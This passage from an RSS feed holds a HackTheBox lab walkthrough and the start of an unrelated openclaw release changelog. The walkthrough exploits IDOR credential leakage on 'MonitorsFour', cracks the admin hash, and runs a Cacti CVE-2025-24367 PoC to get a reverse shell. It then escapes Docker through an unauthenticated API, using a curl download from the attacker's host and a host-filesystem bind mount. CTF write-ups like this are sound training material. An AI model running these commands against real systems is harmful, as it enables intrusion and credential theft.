hosts the web application behind Nginx, while port 5985 exposes WinRM, indicating the backend system is Windows. The presence of a PHPSESSID cookie also suggests the site is using PHP sessions.</p><p>Since the main website appeared mostly static, the next step was searching for hidden subdomains, as internal panels and monitoring applications are commonly hosted separately.</p><h4>Subdomain Discovery</h4><pre>alhamrizvi@alhams-fedora:~/mf$ ffuf -w /usr/share/seclists/subdomains-top1million-5000.txt \<br>-u http://monitorsfour.htb \<br>-H "Host: FUZZ.monitorsfour.htb"<br>...<br><br>cacti     [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 121 ms]<br>...</pre><p>The scan returned a valid subdomain,</p><p>This revealed cacti.monitorsfour.htb, which is running Cacti, a network monitoring platform known for several historical vulnerabilities including authentication bypasses and RCE issues.</p><p>To access it locally, we add the subdomain to /etc/hosts:</p><pre>echo "10.129.12.34 cacti.monitorsfour.htb" | sudo tee -a /etc/hosts</pre><h4>Web Enumeration</h4><pre>alhamrizvi@alhams-fedora:~/mf$ # <br>curl -sL -v http://cacti.monitorsfour.htb/ 2&gt;&amp;1 | head -40<br><br>curl -sL http://cacti.monitorsfour.htb/cacti/ | grep -i "version\|cacti"<br><br>curl -sL http://cacti.monitorsfour.htb/cacti/index.php | grep -i "version"<br>* Host cacti.monitorsfour.htb:80 was resolved.<br>* IPv6: (none)<br>* IPv4: 10.129.52.140, 10.129.1.102<br>*   Trying 10.129.52.140:80...<br>* connect to 10.129.52.140 port 80 from 10.10.14.98 port 38536 failed: No route to host<br>*   Trying 10.129.1.102:80...<br>* Connected to cacti.monitorsfour.htb (10.129.1.102) port 80<br>* using HTTP/1.x<br>&gt; GET / HTTP/1.1<br>&gt; Host: cacti.monitorsfour.htb<br>&gt; User-Agent: curl/8.15.0<br>&gt; Accept: */*<br>&gt; <br>* Request completely sent off<br>&lt; HTTP/1.1 302 Found<br>&lt; Server: nginx<br>&lt; Date: Thu, 21 May 2026 04:55:29 GMT<br>&lt; Content-Type: text/html; charset=UTF-8<br>&lt; Transfer-Encoding: chunked<br>&lt; Connection: keep-alive<br>&lt; X-Powered-By: PHP/8.3.27<br>&lt; Location: /cacti<br>* Ignoring the response-body<br>&lt; <br>* Connection #0 to host cacti.monitorsfour.htb left intact<br>* Issue another request to this URL: 'http://cacti.monitorsfour.htb/cacti'<br>* Re-using existing http: connection with host cacti.monitorsfour.htb<br>&gt; GET /cacti HTTP/1.1<br>&gt; Host: cacti.monitorsfour.htb<br>&gt; User-Agent: curl/8.15.0<br>&gt; Accept: */*<br>&gt; <br>* Request completely sent off<br>&lt; HTTP/1.1 301 Moved Permanently<br>&lt; Server: nginx<br>&lt; Date: Thu, 21 May 2026 04:55:30 GMT<br>&lt; Content-Type: text/html<br>&lt; Content-Length: 162<br>&lt; Location: http://cacti.monitorsfour.htb/cacti/<br>&lt; Connection: keep-alive<br> &lt;title&gt;Login to Cacti&lt;/title&gt;<br>  var cactiConsoleAllowed=false;<br>  var cactiGraphsAllowed=false;<br>  var cactiHome='Cacti Home';<br>  var cactiConsole='Console';<br>  var cactiMisc='Miscellaneous';<br>  var cactiDashboards='Dashboards';<br>  var cactiGeneral='General';<br>  var cactiCharts='Charts';<br>  var cactiProjectPage='Cacti Project Page';<br>  var cactiCommunityForum='User Community';<br>  var cactiUser='User';<br>  var cactiDocumentation='Documentation';<br>  var cactiSpine='Spine';<br>  var cactiRRDProxy='RRDProxy';<br>  var cactiKeyboard='Keyboard';<br>  var cactiShortcuts='Shortcuts';<br>  var cactiContributeTo='Contribute to the Cacti Project';<br>  var cactiDevHelp='Help in Developing';<br>  var cactiDonate='Donation &amp;amp; Sponsoring';<br>  var cactiProfile='Profile';<br>  var cactiTheme='Theme';<br>  var cactiClient='Client';<br>  var cactiTranslate='Help in Translating';<br>  var aboutCacti='About Cacti';<br>  var justCacti='Cacti';<br> &lt;link href='/cacti/include/themes/modern/images/favicon.ico' rel='shortcut icon'&gt;<br> &lt;link href='/cacti/include/themes/modern/images/cacti_logo.gif' rel='icon' sizes='96x96'&gt;<br> &lt;link href='/cacti/include/themes/modern/jquery.zoom.css?aca45860e0c75f2c485ddfc17160d597' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/jquery-ui.css?a51f0bd06d47bdcf4d6563ca44ac7c6d' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/default/style.css?bfe1c8d80ca469731f471745268ea146' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/jquery.multiselect.css?f83e570ae998a2a6f7b07f850c58ce8b' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/jquery.multiselect.filter.css?bdc527651975f5ccfb3fd6f91af0bb93' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/jquery.timepicker.css?431ab7d4ef48afd9c39a647c5c990b0a' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/jquery.colorpicker.css?24366e47db1fb3b58658a53d9a445214' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/billboard.css?695c0029bc6c0f91e299c84485669130' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/pace.css?cca67d465b4ea3986786a0679604a367' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/Diff.css?49e6953c7461abf91ec4e7346d34bd85' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/fa/css/all.css?02e393dfbbce98f9ae76cddc7ea21e52' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/vendor/flag-icons/css/flag-icons.css?ab806eafe572d8149eb3dba8d0283db7' type='text/css' rel='stylesheet'&gt;<br>&lt;link href='/cacti/include/themes/modern/main.css?89dc22c5a1bc9af4ae7b7ae5e9d6e4d1' type='text/css' rel='stylesheet'&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/screenfull.js?60a2ad1d452950179fa4d2c5d1b5dee4' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.js?d16de7de202afe54100a95dea1d4b134'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery-ui.js?bb9963f8eb6cb3e33d6f59112ddb2231'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.ui.touch.punch.js?4195aad6f616651c00557e84c6721646' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.cookie.js?0b804d4f90de70b032a9986b22165b75'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/js.storage.js?32df3a56e44d570b7e3177d71e892214'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jstree.js?5d3a3b5f68b0163175e5630a5e8a3a66'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.hotkeys.js?fbf82bcab286e9fc5cdf863eb067230f' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.tablednd.js?a33b14ebf8ce2abf7911e62cbc19e0c5' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.zoom.js?a4dcf91fed1e4be77b91d1569f4802dc' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.multiselect.js?0fe69963a69cd6e5c87eb380112912bb'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.multiselect.filter.js?ccf700b33985626742e26c6707028bed'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.timepicker.js?f29132ab24085f909242175ad11cfcbc'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.colorpicker.js?3b7032780b24b9b48050e5d245a36260' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.tablesorter.js?8d331985e11cfc65649a915073cb30ed'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.tablesorter.widgets.js?3cc0d7b3426e1db1e4a099db18b17e3c' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.tablesorter.pager.js?8ca32d30195c98492cd028f582f07c8c' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/jquery.sparkline.js?c7638b825bc7deb1cf58c990825d35b2' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/Chart.js?3367829189a65fe699f677e0e4605499' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/dygraph-combined.js?b5b448f71f8c3eb4a39506299bd81b0c' async&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/d3.js?90b69efc9897253561ab62038cd15692'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/billboard.js?9e6056e4dff4d132adc417d1b60c4af5'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/layout.js?666a6d4acff74d80292c7cce8bb1f138'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/pace.js?0232dc2b5854db23a93fd46af0f3bff7'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/js/purify.js?a99712dc2d4399aff979d801bfe65383'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/realtime.js?487d4e7f58ab491e660fe5209f67eb81'&gt;&lt;/script&gt;<br>&lt;script type='text/javascript' src='/cacti/include/themes/modern/main.js?0eb4f9ce093f3c37be9e898793037ccc'&gt;&lt;/script&gt;<br>&lt;script type="text/javascript"&gt;if (top != self) {top.location.href = self.location.href;}&lt;/script&gt;&lt;script type="text/javascript"&gt;var csrfMagicToken = "sid:485055783bd3a989bf24668b6f5e345a3f02b1e2,1779339335;ip:a176cb5a056547ee31136d7acb8e3239864807ea,1779339335";var csrfMagicName = "__csrf_magic";&lt;/script&gt;&lt;script src="/cacti/include/vendor/csrf/csrf-magic.js" type="text/javascript"&gt;&lt;/script&gt;&lt;/head&gt;<br>  &lt;div class='cactiLoginLogo'&gt;&lt;/div&gt;<br>    &lt;div class='cactiLogin'&gt;<br>     &lt;table class='cactiLoginTable'&gt;<br>  &lt;div class='versionInfo'&gt;Version 1.2.28 | (c) 2004-2026 - The Cacti Group&lt;/div&gt;<br> var cactiVersion='1.2.28';<br> var cactiServerOS='unix';<br> var cactiAction='';<br> var refreshPage='/cacti/logout.php?action=timeout';<br> var urlPath='/cacti/';<br>  &lt;div class='versionInfo'&gt;Version 1.2.28 | (c) 2004-2026 - The Cacti Group&lt;/div&gt;<br> var cactiVersion='1.2.28';<br>alhamrizvi@alhams-fedora:~/mf$</pre><p>The output shows that the web server redirects requests from the root path / to /cacti/, confirming that the actual application is hosted inside that directory.</p><pre>HTTP/1.1 302 Found<br>Location: /cacti</pre><p>Then another redirect occurs:</p><pre>HTTP/1.1 301 Moved Permanently<br>Location: http://cacti.monitorsfour.htb/cacti/</pre><p>After following the redirects, the response reveals the Cacti login page. The HTML and JavaScript references confirm the application is Cacti through multiple paths such as:</p><pre>/cacti/include/themes/<br>/cacti/include/js/</pre><p>The most important part of the output is the version disclosure:</p><pre>Version 1.2.28<br>var cactiVersion='1.2.28';</pre><p>This confirms the target is running Cacti version 1.2.28, which is useful for identifying known vulnerabilities and matching public exploits to the correct version.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/552/1*VSzzTUAZumBHeFs0_RrSvA.png"></figure><h4>Fuzzing</h4><p>To look for hidden functionality on the main website, directory and API endpoint fuzzing was performed.</p><pre>alhamrizvi@alhams-fedora:~/mf$ ffuf -w /usr/share/seclists/Discovery/Web-Content/api/api.txt \<br>-u http://monitorsfour.htb/FUZZ</pre><p>The scan discovered an endpoint named /user.</p><p>Testing the endpoint with different token values revealed insecure access control behavior. When the request used token=0, the application returned all user records instead of restricting access properly.</p><p>The response contained usernames and MD5 password hashes, indicating that the backend failed to validate the token correctly.</p><p>This behavior is characteristic of an IDOR vulnerability, where modifying user-controlled parameters allows access to unauthorized data.</p><p>The request sends token=0 to the /user endpoint.</p><pre>alhamrizvi@alhams-fedora:~/mf$ curl -sLv "http://monitorsfour.htb/user?token=0"<br><br>...<br>...<br><br>[<br>  {<br>    "id": 2,<br>    "username": "admin",<br>    "email": "admin@monitorsfour.htb",<br>    "password": "56b32eb43e6f15395f6c46c1c9e1cd36",<br>    "role": "super user",<br>    "token": "8024b78f83f102da4f",<br>    "name": "Marcus Higgins",<br>    "position": "System Administrator"<br>  },<br>  {<br>    "id": 5,<br>    "username": "mwatson",<br>    "email": "mwatson@monitorsfour.htb",<br>    "password": "69196959c16b26ef00b77d82cf6eb169",<br>    "role": "user",<br>    "name": "Michael Watson"<br>  },<br>  {<br>    "id": 6,<br>    "username": "janderson",<br>    "email": "janderson@monitorsfour.htb",<br>    "password": "2a22dcf99190c322d974c8df5ba3256b",<br>    "role": "user",<br>    "name": "Jennifer Anderson"<br>  },<br>  {<br>    "id": 7,<br>    "username": "dthompson",<br>    "email": "dthompson@monitorsfour.htb",<br>    "password": "8d4a7e7fd08555133e056d9aacb1e519",<br>    "role": "user",<br>    "name": "David Thompson"<br>  }<br>]<br></pre><h4>Password Cracking</h4><p>The leaked MD5 hashes were checked against CrackStation, an online hash lookup database containing precomputed password hashes.</p><p>The admin hash:</p><pre>56b32eb43e6f15395f6c46c1c9e1cd36</pre><p>was successfully cracked to:</p><pre>wonderful1</pre><p>Attempting to log into Cacti with admin:wonderful1 failed, which indicated that the username used by the web application differed from the exposed API username.</p><p>Based on the profile information returned earlier (Marcus Higgins), several username variations were tested until the correct credentials were identified:</p><pre>marcus:wonderful1</pre><p>This provided valid access to the Cacti panel.</p><h3>Initial Access</h3><p>After getting CACTI panel access, nothing seems interesting more than cacti panel’s version, we can try to get RCE with this CVE-2025–24367</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*geNDFGZlYdATDCubKIyv0Q.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ICu_8beIe88xqQbSvn9yvA.png"></figure><blockquote><strong>CVE-2025–24367 </strong>is a critical security vulnerability in Cacti, a popular open-source network monitoring and performance graphing framework. With a CVSS score of 8.7, it is classified as a post-authentication Remote Code Execution (RCE) flaw.</blockquote><blockquote><strong>How the Vulnerability Works ?</strong></blockquote><blockquote>The flaw occurs within Cacti’s RRDTool graph template functionality, where the system parses user-supplied data for RRD command parameters (like --right-axis-label).</blockquote><blockquote><strong>The Root Cause</strong>: While Cacti attempts to sanitize user input and escape shell metacharacters, it fails to handle newline characters (\( \backslash n \)) properly.</blockquote><blockquote><strong>The Exploit:</strong> An authenticated attacker can inject newline characters into the input parameters, breaking out of the intended command context. This argument injection allows the attacker to execute additional RRDTool commands and write arbitrary, malicious PHP code directly into the application’s web root.</blockquote><blockquote><strong>The Impact</strong>: Once the malicious PHP script is successfully created in the web root, the attacker can simply access it via a web browser or HTTP request to execute arbitrary system commands with the privileges of the web server.</blockquote><blockquote><strong>Affected Versions</strong></blockquote><blockquote>This vulnerability affects Cacti versions up to 1.2.28.</blockquote><p>After identifying valid credentials for the Cacti panel, I cloned a public PoC for CVE-2025–24367 and prepared a listener to catch the reverse shell.</p><pre>alhamrizvi@alhams-fedora:~/mf/CVE-2025-24367-Cacti-PoC$ sudo python3 exploit.py \<br>-url http://cacti.monitorsfour.htb \<br>-u marcus \<br>-p wonderful1 \<br>-i 10.10.14.98 \<br>-l 8000</pre><pre>nc -lvnp 8000</pre><p>The exploit successfully authenticated to the Cacti instance, generated temporary PHP payload files, and triggered command execution through the vulnerable functionality.</p><pre>[+] Cacti Instance Found!<br>[+] Serving HTTP on port 80<br>[+] Login Successful!<br>[+] Got graph ID: 226<br>[i] Created PHP filename: rKQT0.php<br>[+] Got payload: /bash<br>[i] Created PHP filename: 4bWsW.php<br>[+] Hit timeout, looks good for shell, check your listener!<br>[+] Stopped HTTP server on port 80</pre><p>Shortly after the timeout message appeared, the reverse shell connected back to the Netcat listener, giving remote code execution on the target container.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ whoami<br>www-data<br><br>www-data@821fbd6a43fa:~/html/cacti$ id<br>uid=33(www-data) gid=33(www-data) groups=33(www-data)<br>...<br><br>www-data@821fbd6a43fa:~/html/cacti$ cat /home/marcus/user.txt<br>REDACTED</pre><p>pRIVESC</p><h3>Finding the Docker API</h3><p>After getting a shell inside the Cacti container, I first verified the environment to understand where I was operating from.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ hostname<br>821fbd6a43fa</pre><p>The hostname looked like a container ID, which strongly suggested we were inside Docker. Checking the network configuration confirmed this:</p><pre>www-data@821fbd6a43fa:~/html/cacti$ ip addr<br>2: eth0@if6: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt;<br>    inet 172.18.0.2/16 brd 172.18.255.255 scope global eth0</pre><p>The container was connected to the 172.18.0.0/16 Docker bridge network. I then checked the routing table to identify the gateway address.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ ip route<br>default via 172.18.0.1 dev eth0<br>172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.2</pre><p>A common Docker escape technique is abusing an exposed Docker API on port 2375. I first tested the bridge gateway:</p><pre>www-data@821fbd6a43fa:~/html/cacti$ curl http://172.18.0.1:2375/version<br>curl: (7) Failed to connect to 172.18.0.1 port 2375</pre><p>Nothing was listening there. Next, I tried host.docker.internal, which is commonly available in Docker Desktop environments and resolves back to the host system.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ curl -v http://host.docker.internal:2375/version<br>* Host host.docker.internal:2375 was resolved.<br>* IPv4: 192.168.65.254<br>* Trying 192.168.65.254:2375...<br>* connect to 192.168.65.254 port 2375 failed: Connection refused</pre><p>Although the API was not exposed on .254, the response revealed an important detail: Docker Desktop was using the 192.168.65.0/24 internal subnet. That meant the Docker Engine API could still be exposed somewhere else on that range.</p><p>I also checked whether the Docker socket was mounted inside the container:</p><pre>www-data@821fbd6a43fa:~/html/cacti$ ls -la /var/run/docker.sock 2&gt;/dev/null</pre><pre>www-data@821fbd6a43fa:~/html/cacti$ find / -name "docker.sock" 2&gt;/dev/null</pre><p>No socket was present, so I moved on to scanning the subnet manually for port 2375.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ for i in $(seq 1 254); do<br>(curl -s --connect-timeout 1 http://192.168.65.$i:2375/version 2&gt;/dev/null | grep -q "ApiVersion" &amp;&amp; echo "192.168.65.$i:2375 OPEN") &amp;<br>done; wait</pre><p>The scan returned a valid Docker API endpoint:</p><pre>192.168.65.7:2375 OPEN</pre><p>I confirmed access and retrieved the Docker version information.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ curl http://192.168.65.7:2375/version</pre><pre>{<br>  "Platform": {"Name": "Docker Engine - Community"},<br>  "Version": "28.3.2",<br>  "ApiVersion": "1.51",<br>  "KernelVersion": "6.6.87.2-microsoft-standard-WSL2",<br>  "Os": "linux",<br>  "Arch": "amd64"<br>}</pre><p>The API was completely unauthenticated, allowing arbitrary interaction with the Docker daemon from inside the container.</p><h4>Exploitation</h4><p>To create a new container, I first checked which images were already available on the host.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ curl -s http://192.168.65.7:2375/images/json | grep -o '"RepoTags":\[[^]]*\]'</pre><pre>"RepoTags":["docker_setup-nginx-php:latest"]<br>"RepoTags":["docker_setup-mariadb:latest"]<br>"RepoTags":["alpine:latest"]</pre><p>Since alpine:latest already existed, I used it to create a malicious container that mounted the host filesystem. On my attacking machine, I prepared a JSON payload defining the container configuration.</p><pre>cat &gt; /tmp/container.json &lt;&lt; 'EOF'<br>{<br>  "Image": "alpine:latest",<br>  "Cmd": ["/bin/sh", "-c", "cat /mnt/host_root/Users/Administrator/Desktop/root.txt"],<br>  "HostConfig": {<br>    "Binds": ["/mnt/host/c:/mnt/host_root"]<br>  },<br>  "Tty": true,<br>  "OpenStdin": true<br>}<br>EOF</pre><p>The important part was the bind mount:</p><pre>"Binds": ["/mnt/host/c:/mnt/host_root"]</pre><p>Docker Desktop exposes the Windows host filesystem through /mnt/host/c inside WSL2. By mounting it into the new container, I could directly access files from the host operating system.</p><p>I then served the payload locally:</p><pre>alhamrizvi@alhams-fedora:/mf$ cd /tmp &amp;&amp; python3 -m http.server 8000</pre><p>Inside the compromised container, I downloaded the configuration file.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ curl http://10.10.14.36:8000/container.json -o /tmp/container.json</pre><p>Next, I created the malicious container through the Docker API.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ curl -X POST \<br>-H "Content-Type: application/json" \<br>-d @/tmp/container.json \<br>http://192.168.65.7:2375/containers/create?name=pwned</pre><pre>{"Id":"7d99df11ee0f9d29c093acb26f741bebda84e7d02c90097590c0791241075468","Warnings":[]}</pre><p>After creating the container, I started it:</p><pre>www-data@821fbd6a43fa:~/html/cacti$ curl -X POST \<br>http://192.168.65.7:2375/containers/7d99df11ee0f/start</pre><p>Finally, I retrieved the container logs, which contained the contents of root.txt from the Windows host.</p><pre>www-data@821fbd6a43fa:~/html/cacti$ curl \<br>http://192.168.65.7:2375/containers/7d99df11ee0f/logs?stdout=true<br>REDACTED</pre><p>The exposed Docker API allowed full interaction with the Docker daemon, leading directly to host filesystem access and complete compromise of the machine.</p><p>And Congrats, you have rooted the machine i guess!</p><p>bye bye!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=3862c72c498f" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/monitorsfour-htb-hackthebox-walkthrough-by-alham-rizvi-3862c72c498f">MonitorsFour HTB — HackTheBox Walkthrough | By Alham Rizvi</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.24-beta.2]]></title>
<description><![CDATA[2026.5.24
Changes

iMessage: support thumb-approval reactions — 👍 (Like tapback) resolves an approval as allow-once and 👎 resolves as deny, with the explicit-approver allowlist read from channels.imessage.allowFrom; allow-always stays on the manual /approve  allow-always text fallback. Mirrors th...]]></description>
<link>https://tsecurity.de/de/3544401/downloads/openclaw-2026524-beta2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3544401/downloads/openclaw-2026524-beta2/</guid>
<pubDate>Mon, 25 May 2026 02:01:25 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.24</h2>
<h3>Changes</h3>
<ul>
<li>iMessage: support thumb-approval reactions — <code>👍</code> (Like tapback) resolves an approval as <code>allow-once</code> and <code>👎</code> resolves as <code>deny</code>, with the explicit-approver allowlist read from <code>channels.imessage.allowFrom</code>; <code>allow-always</code> stays on the manual <code>/approve &lt;id&gt; allow-always</code> text fallback. Mirrors the WhatsApp behavior from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4504724227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85477" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85477/hovercard" href="https://github.com/openclaw/openclaw/pull/85477">#85477</a>.</li>
<li>Gateway/perf: reuse process-stable channel catalog reads, avoid repeated bundled-channel boundary checks, and rotate gateway watch CPU profiles so benchmark runs do not accumulate unbounded artifacts.</li>
<li>Gateway/perf: cache stable install-record, channel-catalog, bundled-channel, and Telegram session-store metadata during process-local hot paths to reduce repeated JSON and manifest reads.</li>
<li>Gateway/perf: reuse immutable plugin metadata snapshots across startup, config, model, channel, setup, and secret metadata readers so hot paths avoid repeated plugin file stats and manifest registry reloads.</li>
<li>Talk/realtime: let WebUI and Discord voice callers ask for active OpenClaw run status, cancel, steer, or queue follow-up work while a consult is still running. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4479342391" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84231" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84231/hovercard" href="https://github.com/openclaw/openclaw/pull/84231">#84231</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>Discord/voice: add realtime wake-name gating with agent-name defaults and raise profile bootstrap context budget for longer <code>USER.md</code>/<code>SOUL.md</code> files.</li>
<li>Gateway/perf: lazy-load startup-idle plugin work, core gateway method handlers, and the embedded ACPX runtime so Gateway health and ready signals no longer wait on unused handler trees or ACPX probes.</li>
<li>Gateway/perf: cache plugin SDK public-surface alias maps and skip irrelevant macOS Linuxbrew PATH probes so Gateway startup avoids repeated filesystem walks and slow missing-directory stats.</li>
<li>Image tool: add adaptive model-aware image compression with an <code>agents.defaults.imageQuality</code> preference for choosing token-efficient, balanced, or high-detail media handling.</li>
<li>Meeting Notes: add a source-only external meeting-notes plugin and SDK source-provider contract outside the core npm package, with auto-start capture config, manual transcript imports, read-only <code>openclaw meeting-notes</code> CLI access, and Discord voice as the first live source.</li>
<li>Meeting Notes/Discord: release channel account startup before meeting-notes auto-capture, wait for the Discord voice manager during gateway boot, and stop plugin services before channel shutdown so voice capture state remains available during startup and cleanup.</li>
<li>Docs/channels/config: add Signal <code>configPath</code>, Telegram wildcard topic defaults, local-time backup archive names, Termux home fallback, include-path validation, secret-scanner-safe placeholder guidance, Gemini CLI/Antigravity media guidance, and macOS VM auto-login guidance. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NorseGaud/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NorseGaud">@NorseGaud</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yudistiraashadi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yudistiraashadi">@yudistiraashadi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/huangqian8/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/huangqian8">@huangqian8</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VibhorGautam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VibhorGautam">@VibhorGautam</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maweibin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maweibin">@maweibin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tianxingleo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tianxingleo">@tianxingleo</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IgnacioPro/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IgnacioPro">@IgnacioPro</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xzcxzcyy-claw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xzcxzcyy-claw">@xzcxzcyy-claw</a>.</li>
<li>Docs: clarify model-usage portability, Codex migration prerequisites, status bootstrap wording, thread-bound subagent limits, hook ownership, and config-preserving safety guidance. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aniruddhaadak80/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aniruddhaadak80">@aniruddhaadak80</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leno23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leno23">@leno23</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomDjerry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomDjerry">@TomDjerry</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/matthewxmurphy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/matthewxmurphy">@matthewxmurphy</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stablegenius49/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stablegenius49">@stablegenius49</a>.</li>
